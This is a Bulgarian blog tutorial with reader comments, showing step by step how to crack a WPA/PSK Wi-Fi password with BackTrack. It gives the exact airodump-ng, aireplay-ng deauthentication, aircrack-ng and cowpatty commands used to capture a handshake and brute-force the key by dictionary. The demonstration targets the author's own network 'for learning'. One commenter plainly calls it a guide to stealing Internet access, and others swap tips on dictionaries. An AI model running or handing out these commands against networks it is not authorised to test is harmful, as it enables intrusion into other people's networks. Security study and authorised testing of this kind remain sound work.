Хакване на wireless мрежа с WPA кодиране
January 13th, 2010 от singu
Ето и втората статия на Мартин Петров по темата от неговия блог ( с разрешение на автора ). Моля да имате в предвид, че статията НЕ СЕ разпространява под стандартния за ЧЗВ CC 2.5 лиценз, а е собственост на Мартин. Слагам и Youtube видеото, защото е с по-добра разделителна способност ( гледайте го в HD ).
Здравейте отново с мен Мартин Петров. Предния път ви демонстрирах как се разбива Wireless с WEP, а сега ще ви обясня как се разбива Wireless с WPA/PSK.
За целта ще използваме live дистрибуцията BackTrack 4 и приложенията в нея .
След като сме заредили нашият BackTrack ще отворим терминал за да подготвим нашият мрежови интерфейс за работа в режим мониторинг
# iwconfig wlan0 mode monitoring
След като настроихме мрежовият ни интерфейс сега ще сканираме за wireless мрежа която да компрометираме с учебна цел
# airodump-ng wlan0
Понеже търсим wireless със WPA кодиране,а тук виждаме такъв прекратяваме с Контрол и C. Wireless мрежата която ще използваме ще бъде “mpetrov_net” на шести канал.
След като избрахме коя мрежа да използваме и видяхме, че тя работи на шести канал е време да пуснем в Терминал 2 airodump за да събирем информация за съответната мрежа.
# airodump-ng -w wpa -c 6 –bssid 00:23:CD:D7:84:FC wlan0
Сега ще отворим Терминал 3 за да изпратим пакети за ре- оторизация. Ще трябва да използваме MAC адреса на клиента които можем да вземем от Терминал 1.
# aireplay-ng -0 1 -a 00:23:CD:D7:84:FC -c 00:1A:73:87:B4:E9 wlan0
След това ще погледнем Терминал 2 и ще видим горе в дясно WPA handshake: 00:23:CD:D7:84:FC с което приключваме събирането на пакети и пристъпваме към кракване на паролата.
За кракване на паролата ще използваме два метода единият е, чрез aircrack, а другият , чрез cowpatty
Първо ще реализираме кракване с aircrack
cd /pentest/wireless/aircrack-g/test
aircrack-ng -w password.lst /root/wpa-01.cap
Сега ще направим кракване с cowpatty:
cd /pentest/wireless/cowpatty
./cowpatty -r /root/wpa-01.cap -f dict -s mpetrov_net
И двата метода успяват да кракнат паролата и да я изведат.
Подобни статии:
December 25th, 2010 at 02:23
всичко е нормално до подаването на командите за крака за паролата. На дестопа ми изкара 4 (четри) файла. Проблема е че невиждам кейа на рутера. Има някакви комбинаций на цифри по 5 и 4 но немога да разбера как да ги използвам. Предварително мерси за помоща. Честита коледа.
December 26th, 2010 at 01:45
Щеше да е много хубаво, ако вместо как да крадеш Интернет, беше отделил повече внимание да пишеш правилно на български ( невиждам, комбинаций, немога )
Иначе най-вероятно не ползваш пълен речник и затова не можеш да откриеш паролата на мрежата.
March 25th, 2011 at 20:36
Не се занимавайте с глупости.. Хакване на WPA си е чист късмет. Ако я няма паролата в речника, който ползвате шанса е нулев. Само за справка пълен речник 8 цифрени пароли (само цифри) 1.02 Gb – 2.4 Ghz процесор под windows ги превърта за около 100 часа(под Линукс двойно повече). 10 цифри (само цифри) 123 Gb.
Какво става ако има и букви, не ми се мисли. Единствената възможност е, някой да е толкова глупав че да си сложи парола от 10 цифри (само цифри) без повтаряне -речника е 11.4 Mb и се превърта за около час. Тъпо, но факт !!!!!!!!!!!